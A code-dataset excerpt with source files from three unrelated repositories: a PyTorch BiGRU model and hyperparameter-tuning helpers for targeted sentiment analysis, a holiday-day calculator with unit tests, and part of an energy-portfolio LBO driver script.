"/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,726 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /sentarget/nn/models/gru.py | r"""
The Bilinear Recurrent network is a vanilla model used for targeted sentiment analysis,
and compared to more elaborated models.
Example:
.. code-block:: python
# Defines the shape of the models
INPUT_DIM = len(TEXT.vocab)
EMBEDDING_DIM = 100
HIDDEN_DIM = 128
OUTPUT_DIM = len(LABEL.vocab)
N_LAYERS = 2
BIDIRECTIONAL = True
DROPOUT = 0.25
PAD_IDX = TEXT.vocab.stoi[TEXT.pad_token]
model = BiGRU(INPUT_DIM,
EMBEDDING_DIM,
HIDDEN_DIM,
OUTPUT_DIM,
N_LAYERS,
BIDIRECTIONAL,
DROPOUT,
PAD_IDX)
"""
import time
import torch
import torch.nn as nn
from sentarget.metrics import ConfusionMatrix
from sentarget.utils import progress_bar
from .model import Model
class BiGRU(Model):
    r"""This bilinear model uses the `sklearn` template, i.e. with a fit method within the module.
    Make sure to add a criterion and optimizer when loading a model.

    * :attr:`input_dim` (int): input dimension, i.e. dimension of the incoming words.
    * :attr:`embedding_dim` (int): dimension of the word embeddings.
    * :attr:`hidden_dim` (int): dimension used to map words with the recurrent unit.
    * :attr:`output_dim` (int): dimension used for classification. This one should be equal to the number of classes.
    * :attr:`n_layers` (int): number of recurrent layers.
    * :attr:`bidirectional` (bool): if `True`, set two recurrent layers in the opposite direction.
    * :attr:`dropout` (float): ratio of connections set to zeros.
    * :attr:`pad_idx_text` (int): index of the `<pad>` text token.
    * :attr:`pad_idx_label` (int): index of the `<pad>` label token.
    * :attr:`embeddings` (torch.Tensor): pretrained embeddings, of shape ``(input_dim, embeddings_dim)``.

    Examples::
        >>> INPUT_DIM = len(TEXT.vocab)
        >>> EMBEDDING_DIM = 100
        >>> HIDDEN_DIM = 128
        >>> OUTPUT_DIM = len(LABEL.vocab)
        >>> N_LAYERS = 2
        >>> BIDIRECTIONAL = True
        >>> DROPOUT = 0.25
        >>> PAD_IDX_TEXT = TEXT.vocab.stoi[TEXT.pad_token]
        >>> PAD_IDX_LABEL = LABEL.vocab.stoi[LABEL.unk_token]
        >>> model = BiGRU(INPUT_DIM,
        ...               EMBEDDING_DIM,
        ...               HIDDEN_DIM,
        ...               OUTPUT_DIM,
        ...               N_LAYERS,
        ...               BIDIRECTIONAL,
        ...               DROPOUT,
        ...               pad_idx_text=PAD_IDX_TEXT,
        ...               pad_idx_label=PAD_IDX_LABEL)
        >>> criterion = nn.CrossEntropyLoss()
        >>> optimizer = torch.optim.Adam(model.parameters())
        >>> model.fit(50, train_data, eval_data, criterion, optimizer)
    """

    def __init__(self,
                 input_dim,
                 embedding_dim=100,
                 hidden_dim=128,
                 output_dim=7,
                 n_layers=2,
                 bidirectional=True,
                 dropout=0.25,
                 pad_idx_text=1,
                 unk_idx_text=0,
                 pad_idx_label=0,
                 embeddings=None):
        super().__init__()
        # dimensions
        self.embedding_dim = embedding_dim
        self.output_dim = output_dim
        # modules
        self.embedding = nn.Embedding(input_dim, embedding_dim, padding_idx=pad_idx_text)
        self.gru = nn.GRU(embedding_dim, hidden_dim, n_layers, bidirectional=bidirectional, batch_first=True,
                          dropout=dropout)
        # A bidirectional GRU concatenates forward/backward states, hence the *2.
        self.fc = nn.Linear(hidden_dim * 2 if bidirectional else hidden_dim, output_dim)
        self.dropout = nn.Dropout(dropout)
        if embeddings is not None:
            # Zero out the <pad>/<unk> rows of the pretrained embeddings.
            ignore_index = [idx for idx in [pad_idx_text, unk_idx_text] if idx is not None]
            self.init_embeddings(embeddings, ignore_index=ignore_index)
        # tokens
        self.pad_idx_text = pad_idx_text
        self.pad_idx_label = pad_idx_label
        self.unk_idx_text = unk_idx_text

    def init_embeddings(self, embeddings, ignore_index=None):
        r"""Initialize the embeddings vectors from pre-trained embeddings vectors.

        .. Warning::
            By default, the embeddings will set to zero the tokens at indices 0 and 1,
            that should corresponds to <pad> and <unk>.

        Examples::
            >>> # TEXT: field used to extract text, sentences etc.
            >>> PAD_IDX = TEXT.vocab.stoi[TEXT.pad_token]
            >>> UNK_IDX = TEXT.vocab.stoi[TEXT.unk_token]
            >>> pretrained_embeddings = TEXT.vocab.vectors
            >>> model.init_embeddings(pretrained_embeddings, ignore_index=[PAD_IDX, UNK_IDX])

        Args:
            embeddings (torch.tensor): pre-trained word embeddings, of shape ``(input_dim, embedding_dim)``.
            ignore_index (int or iterable): if not `None`, set to zeros tensors at the indices provided.
        """
        self.embedding.weight.data.copy_(embeddings)
        if ignore_index is not None:
            if isinstance(ignore_index, int):
                self.embedding.weight.data[ignore_index] = torch.zeros(self.embedding_dim)
            elif isinstance(ignore_index, list) or isinstance(ignore_index, tuple):
                for index in ignore_index:
                    self.embedding.weight.data[index] = torch.zeros(self.embedding_dim)
            elif isinstance(ignore_index, dict):
                raise KeyError("Ambiguous `ignore_index` provided. "
                               "Please provide an iterable like a `list` or `tuple`.")

    def forward(self, text, length):
        r"""One forward step.

        .. note::
            The forward propagation requires text's length, so a padded pack can be applied to batches.

        Args:
            text (torch.tensor): text composed of word embeddings vectors from one batch.
            length (torch.tensor): vector indexing the lengths of `text`.

        Examples::
            >>> for batch in data_iterator:
            >>>     text, length = batch.text
            >>>     model.forward(text, length)
        """
        # Word embeddings
        embeddings = self.embedding(text)
        # Apply a dropout
        embedded = self.dropout(embeddings)
        # Pack and pad a batch
        # NOTE(review): recent torch versions require `length` on CPU here -- confirm for the targeted torch release.
        packedembeds = nn.utils.rnn.pack_padded_sequence(embedded, length, batch_first=True)
        # Apply the recurrent cell
        packed_output, h_n = self.gru(packedembeds)
        # Predict
        output = nn.utils.rnn.pad_packed_sequence(packed_output, batch_first=True)[0]
        # Apply another dropout and a linear layer for classification tasks
        predictions = self.fc(self.dropout(output))
        return predictions

    def get_accuracy(self, y_tilde, y):
        r"""Computes the accuracy from a set of predictions and gold labels.

        .. note::
            The resulting accuracy does not count `<pad>` tokens.

        Args:
            y_tilde (torch.tensor): predictions.
            y (torch.tensor): gold labels.

        Returns:
            torch.tensor: the global accuracy, of shape 0.
        """
        # Indices of every non-<pad> gold label; accuracy is measured on those only.
        non_pad_elements = (y != self.pad_idx_label).nonzero()
        correct = y_tilde[non_pad_elements].squeeze(1).eq(y[non_pad_elements])
        accuracy = correct.sum() / torch.FloatTensor([y[non_pad_elements].shape[0]])
        # Handles division by 0
        accuracy = accuracy if not torch.isnan(accuracy) else torch.tensor(0)
        return accuracy

    def run(self, iterator, criterion, optimizer, verbose=True):
        r"""Train one time the model on iterator data.

        Args:
            iterator (Iterator): iterator containing batch samples of data.
            criterion (Loss): loss function to measure scores.
            optimizer (Optimizer): optimizer used during training to update weights.
            verbose (bool): if `True` display a progress bar.

        Returns:
            dict: the performance and metrics of the training session.
        """
        # Initialize the variables
        start_time = time.time()
        epoch_loss = 0
        epoch_acc = 0
        # All class indices except the <pad> label take part in the confusion matrix.
        class_labels = list(range(self.output_dim))
        class_labels.pop(self.pad_idx_label)
        confusion_matrix = ConfusionMatrix(labels=class_labels)
        # Train mode
        self.train()
        for (idx, batch) in enumerate(iterator):
            optimizer.zero_grad()
            # One forward step
            text, length = batch.text
            y_hat = self.forward(text, length)
            # Flatten (batch, seq, classes) -> (batch*seq, classes) for the loss.
            y_hat = y_hat.view(-1, y_hat.shape[-1])
            label = batch.label.view(-1)
            # Get the predicted classes
            y_tilde = y_hat.argmax(dim=1, keepdim=True)
            # Compute the loss and update the weights
            loss = criterion(y_hat, label)
            loss.backward()
            optimizer.step()
            epoch_loss += loss.item()
            # Default accuracy
            acc = self.get_accuracy(y_tilde, label)
            epoch_acc += acc.item()
            # Optional: display a progress bar
            if verbose:
                progress_bar(idx, len(iterator) - 1, prefix="Training:\t", start_time=start_time)
            # Update the confusion matrix
            # NOTE(review): `.numpy()` requires CPU tensors -- would fail on CUDA; confirm intended devices.
            confusion_matrix.update(label.long().numpy(), y_tilde.long().numpy())
        # Store the loss, accuracy and metrics in a dictionary
        results_train = {"loss": epoch_loss / len(iterator),
                         "accuracy": epoch_acc / len(iterator),
                         **confusion_matrix.to_dict()
                         }
        return results_train

    def evaluate(self, iterator, criterion, verbose=True):
        r"""Evaluate one time the model on iterator data.

        Args:
            iterator (Iterator): iterator containing batch samples of data.
            criterion (Loss): loss function to measure scores.
            verbose (bool): if `True` display a progress bar.

        Returns:
            dict: the performance and metrics of the training session.
        """
        # Initialize the variables
        start_time = time.time()
        epoch_loss = 0
        epoch_acc = 0
        class_labels = list(range(self.output_dim))
        class_labels.pop(self.pad_idx_label)
        confusion_matrix = ConfusionMatrix(labels=class_labels)
        # Eval mode: disables dropout; no_grad() skips autograd bookkeeping.
        self.eval()
        with torch.no_grad():
            for (idx, batch) in enumerate(iterator):
                # One forward step
                text, length = batch.text
                y_hat = self.forward(text, length)
                y_hat = y_hat.view(-1, y_hat.shape[-1])
                label = batch.label.view(-1)
                # Get the predicted classes
                y_tilde = y_hat.argmax(dim=1, keepdim=True)
                # Compute the loss
                loss = criterion(y_hat, label)
                epoch_loss += loss.item()
                # Default accuracy
                acc = self.get_accuracy(y_tilde, label)
                epoch_acc += acc.item()
                # Optional: display a progress bar
                if verbose:
                    progress_bar(idx, len(iterator) - 1, prefix="Evaluation:\t", start_time=start_time)
                # Update the confusion matrix
                confusion_matrix.update(label.long().numpy(), y_tilde.long().numpy())
        # Store the loss, accuracy and metrics in a dictionary
        results_eval = {"loss": epoch_loss / len(iterator),
                        "accuracy": epoch_acc / len(iterator),
                        **confusion_matrix.to_dict()
                        }
        return results_eval
| {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,727 | arthurdjn/targeted-sentiment-analysis | refs/heads/master | /sentarget/tuner/functional.py | """
Optimization functions used for hyperparameters tuning.
"""
import inspect
from sentarget.utils import rgetattr, rsetattr
def tune(model, config):
    r"""Apply a configuration of hyperparameters to ``model``, inplace.

    .. note::
        If the key is separated with a '.', the first part names the module *type*
        to change: ``key = 'LSTM.dropout'`` will modify only the dropout
        corresponding to ``LSTM`` layers.
        The double underscore ``__`` is used to modify a specific attribute by its name
        (and not its type), like ``key = 'linear__in_features'`` will modify only the
        ``in_features`` attribute from the ``Linear`` layer saved under the attribute
        ``linear`` of the custom model.

    .. warning::
        The operation modifies the model inplace.

    Args:
        model (Model): the model to tune its hyperparameters.
        config (dict): dictionary of parameters to change.

    Returns:
        dict: the configuration to apply to a model.

    Examples::
        >>> config = {'LSTM.dropout': 0.2}
        >>> tune(model, config)
    """
    for (key, value) in config.items():
        attribute_list = key.split('__')
        # Case 1 -- 'attr__path.to.param': tune the submodule stored under the
        # *attribute* named ``attr`` on the model.
        if len(attribute_list) == 2:
            target = getattr(model, attribute_list[0])
            try:
                rsetattr(target, attribute_list[1], value)
            except AttributeError:
                pass
        # Case 2 -- 'Type.path.to.param': tune every submodule of class ``Type``.
        # Fix: the previous implementation stripped the type prefix but never
        # filtered on it, so e.g. 'LSTM.dropout' mutated *every* module exposing
        # a ``dropout`` attribute.  The class-name check restores the documented
        # behavior.
        elif len(attribute_list) == 1:
            type_name, _, attribute_path = key.partition('.')
            for module in model.modules():
                if type(module).__name__ != type_name:
                    continue
                try:
                    rsetattr(module, attribute_path, value)
                except AttributeError:
                    pass
        else:
            raise KeyError(f'path to attribute {key} is ambiguous. Please separate objects with a `.` or `__`. \
        More informations at https://pages.github.uio.no/arthurd/in5550-exam/source/package.html#sentarget-optim')
def init_cls(class_instance, config):
    r"""Initialize a class instance from a set of possible values.

    .. note::
        More parameters can be added than the object needs. They will just not be used.

    Args:
        class_instance (class): class to initialize.
        config (dict): possible values of init parameters.

    Returns:
        initialized object
    """
    # Fix: inspect.getargspec was deprecated and removed in Python 3.11;
    # inspect.signature is the supported replacement and also handles
    # keyword-only parameters.  'self' is excluded explicitly.
    parameters = inspect.signature(class_instance.__init__).parameters
    init = {key: value for (key, value) in config.items()
            if key in parameters and key != 'self'}
    return class_instance(**init)
def tune_optimizer(optimizer, config):
    r"""Tune the default parameters of an optimizer.

    .. warning::
        The operation modifies the optimizer's ``defaults`` dictionary directly.

    Args:
        optimizer (Optimizer): optimizer to tune.
        config (dict): dictionary of new parameters to set.
    """
    defaults = optimizer.defaults
    # Only overwrite keys the optimizer actually defines; ignore the rest.
    for key in config.keys() & defaults.keys():
        defaults[key] = config[key]
| {"/sentarget/metrics/__init__.py": ["/sentarget/metrics/confusion.py", "/sentarget/metrics/functional.py"], "/sentarget/datasets/nonlpl.py": ["/sentarget/datasets/_utils.py"], "/sentarget/metrics/confusion.py": ["/sentarget/metrics/functional.py"], "/sentarget/process.py": ["/sentarget/datasets/__init__.py"], "/sentarget/utils/__init__.py": ["/sentarget/utils/display.py", "/sentarget/utils/functions.py"], "/sentarget/tuner/tuner.py": ["/sentarget/nn/models/__init__.py", "/sentarget/tuner/functional.py", "/sentarget/utils/__init__.py"], "/sentarget/nn/models/model.py": ["/sentarget/utils/__init__.py"], "/sentarget/datasets/_utils.py": ["/sentarget/utils/__init__.py"], "/sentarget/nn/models/__init__.py": ["/sentarget/nn/models/gru.py"], "/sentarget/nn/solver.py": ["/sentarget/utils/__init__.py"], "/scripts/gridsearch.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/tuner/__init__.py"], "/sentarget/nn/__init__.py": ["/sentarget/nn/solver.py"], "/sentarget/datasets/__init__.py": ["/sentarget/datasets/norecfine.py", "/sentarget/datasets/nonlpl.py"], "/scripts/eval.py": ["/sentarget/__init__.py", "/sentarget/datasets/__init__.py", "/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py"], "/sentarget/tuner/__init__.py": ["/sentarget/tuner/tuner.py", "/sentarget/tuner/functional.py"], "/sentarget/__init__.py": ["/sentarget/tuner/__init__.py", "/sentarget/nn/__init__.py"], "/sentarget/nn/models/gru.py": ["/sentarget/metrics/__init__.py", "/sentarget/utils/__init__.py", "/sentarget/nn/models/model.py"], "/sentarget/tuner/functional.py": ["/sentarget/utils/__init__.py"]} |
50,730 | vesamattila-code/visma_holidayplanner | refs/heads/master | /unittests.py | import unittest
from holidayplanner import HolidayPlanner, HolidayCVSHandler,HolidayStartLaterThanEnd,HolidayAccess,HolidayRangeTooWide
import datetime
from datetime import date, timedelta, datetime
import pandas as pd
class TestHolidayPlanner(unittest.TestCase):
    """Unit tests for HolidayPlanner / HolidayCVSHandler / HolidayAccess.

    Requires fixture files 'holiday_dates.csv' and
    'holiday_dates_with_fake_sunday_11102020.csv' in the working directory.
    """

    def test_holiday_access(self):
        # Base class: getter/setter are callable and holidays_in_range is abstract.
        acc=HolidayAccess()
        acc.get_access()
        acc.set_access(0)
        with self.assertRaises(NotImplementedError):
            acc.holidays_in_range(date(2020,12,31),date(2020,10,1))

    def test_planner_default_init(self):
        p = HolidayPlanner(HolidayCVSHandler('holiday_dates.csv'))
        self.assertTrue(p)

    def test_days_needed_start_later_than_end(self):
        planner = HolidayPlanner(HolidayCVSHandler('holiday_dates.csv'))
        with self.assertRaises(HolidayStartLaterThanEnd):
            planner.days_needed(date(2020,12,31),date(2020,10,1))

    def test_days_needed_range_over_max_range(self):
        # Oct 1 -> Dec 1 is 61 days, above the 50-day maximum.
        planner = HolidayPlanner(HolidayCVSHandler('holiday_dates.csv'))
        with self.assertRaises(HolidayRangeTooWide):
            planner.days_needed(date(2020,10,1),date(2020,12,1))

    def test_planner_with_empty_param(self):
        # The error is raised lazily, when the CSV is first read in days_needed.
        with self.assertRaises(FileNotFoundError):
            planner = HolidayPlanner(HolidayCVSHandler(''))
            result = planner.days_needed(date(2020,10,1),date(2020,10,12))

    def test_planner_with_non_string(self):
        # NOTE(review): no assertion here -- this only checks construction does not raise.
        planner=HolidayPlanner(HolidayCVSHandler(123))

    def test_sundays_in_range(self):
        planner = HolidayPlanner(HolidayCVSHandler('holiday_dates.csv'))
        self.assertEqual(planner.sundays_in_range(
            date(2020,10,1),date(2020,10,31)),4)

    def test_days_needed_valid_month_25_days(self):
        planner = HolidayPlanner(HolidayCVSHandler('holiday_dates.csv'))
        self.assertEqual(planner.days_needed(date(2020,1,1),
            date(2020,1,31)),25)

    def test_days_needed_valid_month_15_days(self):
        planner = HolidayPlanner(HolidayCVSHandler('holiday_dates.csv'))
        self.assertEqual(planner.days_needed(
            date(2020,4,10), date(2020,5,1)),16)

    def test_days_needed_valid_month_year_changing(self):
        planner = HolidayPlanner(HolidayCVSHandler('holiday_dates.csv'))
        self.assertEqual(planner.days_needed(date(2020,12,25),
            date(2021,1,7)),9)

    def test_days_needed_one_day_scope(self):
        # A single-day request always costs exactly one holiday day.
        planner = HolidayPlanner(HolidayCVSHandler('holiday_dates.csv'))
        self.assertEqual(planner.days_needed(
            date(2021,12,25),date(2021,12,25)),1)

    def test_days_needed_without_fake_sunday_added(self):
        planner = HolidayPlanner(HolidayCVSHandler('holiday_dates.csv'))
        self.assertEqual(planner.days_needed(
            date(2020,10,1),date(2020,10,30)),26)

    def test_days_needed_with_fake_sunday_added(self):
        # A holiday that falls on a Sunday must not be double-counted.
        planner = HolidayPlanner(HolidayCVSHandler('holiday_dates_with_fake_sunday_11102020.csv'))
        self.assertEqual(planner.days_needed(
            date(2020,10,1),date(2020,10,30)),26)
if __name__ == '__main__':
    # Run the test suite when the file is executed directly.
    unittest.main()
50,731 | vesamattila-code/visma_holidayplanner | refs/heads/master | /holidayplanner.py | import pandas as pd
from datetime import date, timedelta, datetime
import os.path
from os import path
class HolidayRangeTooWide(Exception):
    """Raised when a requested holiday range exceeds the allowed maximum length."""
class HolidayStartLaterThanEnd(Exception):
    """Raised when a holiday range's start date is after its end date."""
# Maximum length (in days) of a range accepted by HolidayPlanner.days_needed.
HOLIDAY_MAX_RANGE = 50
class HolidayAccess():
    """Generic interface class to official holiday info.

    Concrete data sources (CSV files, web services, ...) subclass this and
    implement :meth:`holidays_in_range`.
    """

    def __init__(self, access=0):
        # `access` identifies the underlying data source (e.g. a file path).
        self.access = access

    def get_access(self):
        """Return the data-source handle."""
        return self.access

    def set_access(self, access):
        """Replace the data-source handle."""
        self.access = access

    def holidays_in_range(self, start, end):
        """Count official holidays in [start, end]; subclasses must override."""
        raise NotImplementedError
class HolidayCVSHandler(HolidayAccess):
    """Holiday data handler backed by a CSV file of official holidays.

    ``access`` (inherited) is the path to a headerless CSV file with one
    ``dd.mm.YYYY`` date per line.
    """

    def __init__(self, access):
        HolidayAccess.__init__(self, access)

    def holidays_in_range(self, start, end):
        """Count official holidays in [start, end], excluding Sundays.

        Args:
            start (datetime.date): first day of the range (inclusive).
            end (datetime.date): last day of the range (inclusive).

        Returns:
            int: number of non-Sunday official holidays in the range.

        Raises:
            FileNotFoundError: if the CSV file does not exist.
        """
        if not path.exists(self.access):
            raise FileNotFoundError
        official_holidays = pd.read_csv(
            self.access, names=['date'])
        count = 0
        for raw_date in official_holidays['date']:
            holiday = datetime.strptime(raw_date, "%d.%m.%Y").date()
            # Direct range + weekday test replaces the original day-by-day
            # scan of the whole range for every holiday: same result, O(1)
            # per holiday instead of O(range length).
            # weekday() == 6 is Sunday, which is already a free day.
            if start <= holiday <= end and holiday.weekday() != 6:
                count += 1
        return count
class HolidayPlanner():
    """Holiday planner: computes how many holiday days a date range costs."""

    def __init__(self, holiday_access):
        # holiday_access: a HolidayAccess implementation (e.g. HolidayCVSHandler).
        self.holiday_handler = holiday_access
        self.holiday_max_range = HOLIDAY_MAX_RANGE

    def days_needed(self, start, end):
        """Return the number of holiday days consumed by [start, end].

        Sundays and official (non-Sunday) holidays in the range are free.

        Raises:
            HolidayStartLaterThanEnd: if `start` is after `end`.
            HolidayRangeTooWide: if the range exceeds the configured maximum.
        """
        if start > end:
            raise HolidayStartLaterThanEnd
        if start == end:
            # A single-day request always costs exactly one day.
            return 1
        span = end - start
        if span.days > self.holiday_max_range:
            raise HolidayRangeTooWide
        total_days = span.days + 1  # inclusive day count
        return self.calculate_holidays_needed(
            total_days,
            self.sundays_in_range(start, end),
            self.holiday_handler.holidays_in_range(start, end))

    def sundays_in_range(self, d0, d1):
        """Count the Sundays between d0 and d1 (both inclusive)."""
        # Jump to the first Sunday on/after d0, then step one week at a time.
        current = d0 + timedelta(days=6 - d0.weekday())
        count = 0
        while current <= d1:
            count += 1
            current += timedelta(days=7)
        return count

    def calculate_holidays_needed(self, days, sundays, holidays):
        """Days in range minus free days (Sundays and official holidays)."""
        return days - sundays - holidays
| {"/unittests.py": ["/holidayplanner.py"]} |
50,732 | changliukean/KEAN3 | refs/heads/master | /lbo_testcases.py | from utility.dispatchUtils import load_pp_tech_info, convert_uc_dataframe, load_solar_dispatch, load_nuclear_dispatch
from datetime import datetime, date
from database.dbPCUC import put_characteristics
from database.dbDispatch import put_dispatch, get_dispatch
from database.dbLBO import put_powerplant, put_technology, get_powerplants, get_technology, put_financials_lbo, get_financials_lbo, put_lbo_assumptions, get_lbo_assumptions,get_portfolio_with_powerplant,get_powerplants_by_portfolio
from database.dbScenarioMaster import insert_scenario_master, delete_scenario_master
from utility.lboUtils import read_excel_lbo_inputs
from lbo import lbo
from model.Entity import Powerplant
from model.Portfolio import Portfolio
from utility.dateUtils import get_month_list
import numpy as np
import sys
import pandas as pd
def run_convert_uc(project_name, date_start, date_end, pc_scenario, pc_version, plant_list=[], plant_tech_master_file=None, push_to_powerplant=False, push_to_technology=False, push_to_plant_characteristics=False):
    """Load plant/technology master data, convert it to plant-characteristics (UC)
    rows for the given scenario/version and date range, and optionally push each
    stage to the database.

    Args:
        project_name (str): portfolio/project identifier used to look up plants.
        date_start, date_end: range the characteristics are generated for.
        pc_scenario, pc_version: scenario and version tags for the output rows.
        plant_list (list): if non-empty, restrict to these plant names.
        plant_tech_master_file: optional Excel/master file with plant + tech info.
        push_to_powerplant / push_to_technology / push_to_plant_characteristics (bool):
            write the corresponding dataframe to the database when True.

    Returns:
        pd.DataFrame: the converted plant-characteristics dataframe.
    """
    # NOTE(review): mutable default `plant_list=[]` -- harmless here (only read),
    # but prefer `plant_list=None`.
    # "ERCOT", "HAYSEN3_4", "ERCOT", "HB_SOUTH", date(2017,1,1), date(2019,12,31), 'Day Ahead', 'Hays'
    # name, fuel_type, market, node, power_hub
    if plant_tech_master_file:
        ready_to_kean_pp_df, ready_to_kean_tech_df = load_pp_tech_info(plant_tech_master_file)
        ready_to_kean_tech_df['project'] = project_name
        if push_to_powerplant:
            put_powerplant(ready_to_kean_pp_df)
        if push_to_technology:
            put_technology(ready_to_kean_tech_df)
    # Re-read from the DB so pushed and pre-existing rows are treated alike.
    powerplant_df = get_powerplants_by_portfolio(project_name)
    if plant_list != []:
        powerplant_df = powerplant_df.loc[powerplant_df.name.isin(plant_list)]
    technology_df = get_technology(project_name)
    print (len(powerplant_df))
    print (len(technology_df))
    ready_to_kean_converted_pc_df = convert_uc_dataframe(powerplant_df, technology_df, pc_scenario, pc_version, date_start, date_end)
    if push_to_plant_characteristics:
        put_characteristics(ready_to_kean_converted_pc_df, pc_scenario, pc_version)
    return ready_to_kean_converted_pc_df
def run_basis_calculation(powerplant_df, basis_start_date, basis_end_date, selected_powerplant_list=None):
    """Build monthly on/off-peak basis data for the plants in ``powerplant_df``.

    Plants missing either a ``node`` or a ``power_hub`` are skipped; when
    ``selected_powerplant_list`` is given, only the named plants are processed.

    FIXES vs. the original:
      * the two branches duplicated the same body; they are merged into one
        pair of guard conditions.
      * per-row ``DataFrame.append`` (deprecated, removed in pandas 2.0, and
        quadratic) is replaced by collecting frames and one ``pd.concat``.

    Parameters
    ----------
    powerplant_df : pandas.DataFrame
        Must carry columns name, fuel_type, market, node, power_hub.
    basis_start_date, basis_end_date : datetime.date
        Historical window over which basis is computed (Day Ahead prices).
    selected_powerplant_list : list[str] or None
        Optional whitelist of plant names.

    Returns
    -------
    (pandas.DataFrame, pandas.DataFrame)
        Pivoted monthly basis table (one column per plant/peak/instrument)
        and the detailed merged hub/nodal LMP rows.
    """
    result_frames = []
    detail_frames = []
    for index, row in powerplant_df.iterrows():
        # Skip plants without both a node and a power hub.
        if row['node'] == '' or row['power_hub'] == '':
            continue
        # Honour the optional plant whitelist.
        if selected_powerplant_list is not None and row['name'] not in selected_powerplant_list:
            continue
        test_pp = Powerplant(row['name'], row['fuel_type'], row['market'], row['node'], row['power_hub'])
        merged_hub_nodal_lmp_df, monthly_onoffpeak_basis_df = test_pp.build_basis(basis_start_date, basis_end_date, 'Day Ahead')
        result_frames.append(monthly_onoffpeak_basis_df)
        detail_frames.append(merged_hub_nodal_lmp_df)
    portfolio_basis_result_df = pd.concat(result_frames) if result_frames else pd.DataFrame()
    portfolio_basis_detail_df = pd.concat(detail_frames) if detail_frames else pd.DataFrame()
    # Reshape: long (month, peak_info, plant, instrument) records ...
    portfolio_basis_result_df = portfolio_basis_result_df.reset_index()
    portfolio_basis_result_df = pd.melt(portfolio_basis_result_df, id_vars=['month','peak_info','plant'],
                                        value_vars=['basis_$','basis_%'],
                                        var_name='instrument',
                                        value_name='value')
    # ... with an instrument_id like "<plant> basis - <peak>_$" ...
    portfolio_basis_result_df['instrument_id'] = portfolio_basis_result_df.apply(lambda row: row['plant'] + ' basis - ' + row['peak_info'] + "_" + row['instrument'].split("_")[1], axis=1)
    portfolio_basis_result_df = portfolio_basis_result_df.reset_index()
    # ... pivoted wide: one row per month, one column per instrument_id.
    portfolio_basis_result_df = pd.pivot_table(portfolio_basis_result_df, index=['month'], columns=['instrument_id'], values='value', aggfunc=np.sum)
    portfolio_basis_result_df = portfolio_basis_result_df.reset_index()
    return portfolio_basis_result_df, portfolio_basis_detail_df
def load_nondispatchable_plants(portfolio, scenario, version, type, plant_name, assumptions_file_path):
    """Load the dispatch profile of a non-dispatchable plant into KEAN.

    Reads the plant's assumed generation profile from the assumptions
    workbook and stores it under (portfolio, scenario, version).  ``type``
    selects the loader: 'solar' or 'nuclear'; any other value is a no-op.
    """
    if type == 'solar':
        profile_df = load_solar_dispatch(portfolio, scenario, version, plant_name, assumptions_file_path)
        put_dispatch(portfolio, scenario, version, profile_df)
    elif type == 'nuclear':
        profile_df = load_nuclear_dispatch(portfolio, scenario, version, plant_name, assumptions_file_path)
        put_dispatch(portfolio, scenario, version, profile_df)
def load_lbo_assumptions(lbo_assumptions_file_path, portfolio, scenario, version, fsli_list, overwrite_option):
    """Read LBO assumption inputs from Excel and persist them to KEAN.

    The requested FSLIs are read from the workbook, tagged with the scenario
    metadata columns, and written to the lbo_assumptions table; existing
    rows are replaced when ``overwrite_option`` is truthy.
    """
    ready_to_kean_lbo_assumptions_df = read_excel_lbo_inputs(lbo_assumptions_file_path, fsli_list)
    # Stamp every row with its scenario key before persisting.
    for column_name, column_value in (('scenario', scenario), ('version', version), ('portfolio', portfolio)):
        ready_to_kean_lbo_assumptions_df[column_name] = column_value
    put_lbo_assumptions(ready_to_kean_lbo_assumptions_df, portfolio, scenario, version, overwrite_option=overwrite_option)
# Driver script for the Norway portfolio LBO run.  The numbered workflow
# steps below are toggled on/off by commenting; the triple-quoted strings
# act as section markers only (no-op statement expressions).  Steps with
# database side effects (put_*, delete_*, insert_*) are order dependent.
if __name__ == '__main__':
    portfolio = 'Norway'
    portfolio_obj = Portfolio('Norway')
    # Powerplant master data for the portfolio, used by several steps below.
    powerplant_df = get_powerplants_by_portfolio(portfolio)
    # powerplant_df.to_csv("ppd.csv")
    """ 1 Convert PCUC file and save it to KEAN """
    # plant_tech_master_file = r"C:\Users\cliu\Kindle Energy Dropbox\Chang Liu\LBO\data\Norway\pcuc\Norway plant char assumption_input v11.xlsx"
    # pc_date_start = date(2020, 1, 1)
    # pc_date_end = date(2027,12,31)
    # pc_scenario = 'Norway Converted'
    # pc_version = 'v1'
    # # run_convert_uc(plant_tech_master_file, pc_date_start, pc_date_end, pc_scenario, pc_version)
    # run_convert_uc('Norway', pc_date_start, pc_date_end, pc_scenario, pc_version, plant_tech_master_file=plant_tech_master_file, push_to_powerplant=False, push_to_technology=True, push_to_plant_characteristics=False)
    #
